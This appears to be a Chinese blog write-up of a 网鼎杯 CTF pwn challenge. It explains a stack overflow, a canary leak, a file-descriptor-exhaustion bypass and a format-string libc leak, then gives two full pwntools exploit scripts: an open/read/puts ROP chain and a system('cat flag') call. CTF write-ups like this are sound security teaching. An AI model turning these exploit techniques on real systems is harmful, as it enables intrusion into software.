×

网鼎杯(4)-pwn

96
D4rk3r
2018.09.01 22:09 字数 276

题目链接

保护

保护还挺多

main函数
bored函数
fmt函数
secret函数
stack函数

主要漏洞点:

  • stack函数有栈溢出,还有puts函数可以泄漏栈的东西
  • secret函数由于每个用户能打开的文件数是一定的,函数没有fclose ,一直开 最后读进去的就是空的,所以可以绕过memcmp函数去执行qmemcpy函数达到栈溢出
读写函数细节

类似的题有pwnable.kr的otp (后面做到的时候可以再回顾一下)

  • fmt函数有2字节的格式化字符串漏洞
  • bored函数可以控制secret栈溢出时的payload,带有一个递归功能

利用方式:
1.利用bored函数递归几次改变栈结构再利用stack函数泄漏出canary,然后利用bored和secret函数来rop : open('./flag',0) --> read(0,bss,0x200) --> puts(bss)

2.利用bored函数递归几次改变栈结构再利用stack函数泄漏出canary,再用fmt函数泄漏libc得到system地址,然后利用bored和secret函数栈溢出执行 : system('cat flag')

exp1:

from pwn import *
#context.log_level = 'debug'


p = process('./pwn.')
elf = ELF('./pwn.')

def stack(payload):
    p.sendlineafter('option:','1')
    p.sendafter('once..\n',payload)

def secret(payload):
    p.sendlineafter('option:','9011')
    p.sendafter('code:',payload)

def fsb(payload):
    p.sendlineafter('option:','3')
    p.sendafter('think?)\n',payload)

def bored(payload,choice = 'n'):
    p.sendafter('bored...\n',payload)
    p.sendafter('y/n\n',choice)


#leak canary
p.sendlineafter('option:','2')
for i in range(4):
    bored('a')
bored('a','y')


stack('a'*0xa8 + 'a')
p.recv(0xa9)
canary = u64(p.recv(7).rjust(8,'\x00'))
log.success('canary : 0x%x' %canary)

#open('./flag',0) --> read(0,0x602068,0x200) --> puts(0x602068)
'''
open函数返回的文件描述符fd一定是未使用的最小的文件描述符。
#利用这个特性,可以改变0,1,2这三个文件描述符所指向的文件,由于进程默认会打开0,1,2这三个文件描述符,而且指向了键盘和显示器的设备文件。
如果在open之前先进行close(0),然后再调用open函数就会返回最小的未使用的fd,也就是0。
如果没有就是3
'''
open_plt = elf.plt['open']
read_plt = elf.plt['read']
puts_plt = elf.plt['puts']
pop_rdi = 0x0000000000400c53
pop_rsi_r15 = 0x0000000000400c51

payload = './flag\0\0' + p64(canary) + 'a'*0x8
payload += p64(pop_rdi) + p64(0x602080) + p64(pop_rsi_r15) + p64(0) + p64(0)
payload += p64(open_plt) + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x602068) + p64(0)
payload += p64(read_plt) + p64(pop_rdi) + p64(0x602068) + p64(puts_plt) 

p.sendlineafter('option:','2')
bored(payload,'y')
#gdb.attach(p)
try:
    for i in range(9999):
        secret('\0')

except Exception as e:
    p.close()


p.interactive()

exp2:

from pwn import *
#context.log_level = 'debug'


p = process('./pwn.')
elf = ELF('./pwn.')

def stack(payload):
    p.sendlineafter('option:','1')
    p.sendafter('once..\n',payload)

def secret(payload):
    p.sendlineafter('option:','9011')
    p.sendafter('code:',payload)

def fsb(payload):
    p.sendlineafter('option:','3')
    p.sendafter('think?)\n',payload)

def bored(payload,choice = 'n'):
    p.sendafter('bored...\n',payload)
    p.sendafter('y/n\n',choice)


#leak canary
p.sendlineafter('option:','2')
for i in range(4):
    bored('a')
bored('a','y')

stack('a'*0xa8 + 'a')
p.recv(0xa9)
canary = u64(p.recv(7).rjust(8,'\x00'))
log.success('canary : 0x%x' %canary)

offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd57
offset_onegadge = 0xf1147
pop_rdi = 0x0000000000400c53


#leak libc
fsb('%a')
p.recvuntil('0x0.0')
libc_base = int(p.recvuntil('p-',drop = True),16) - 0x3c56a3
log.success('libc base addr : 0x%x' %libc_base)
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
log.success('system addr : 0x%x' %system_addr)
log.success('binsh addr : 0x%x' %binsh_addr)


#cat flag
payload = 'cat flag' + p64(canary) + 'a'*0x8
payload += p64(pop_rdi) + p64(0x602080) + p64(system_addr)

p.sendlineafter('option:','2')
bored(payload,'y')

#gdb.attach(p)
try:
    for i in range(9999):
        secret('\0')

except Exception as e:
    p.close()


p.interactive()

这里用

find .|xargs grep -ri 'define O_RDONLY'  #去看了下open函数的参数flags的意思
------------------------------------------------------
/* File access modes for `open' and `fcntl'.  */
#define O_RDONLY        0       /* Open read-only.  */
#define O_WRONLY        1       /* Open write-only.  */
#define O_RDWR          2       /* Open read/write.  */
比赛WP
Web note ad 1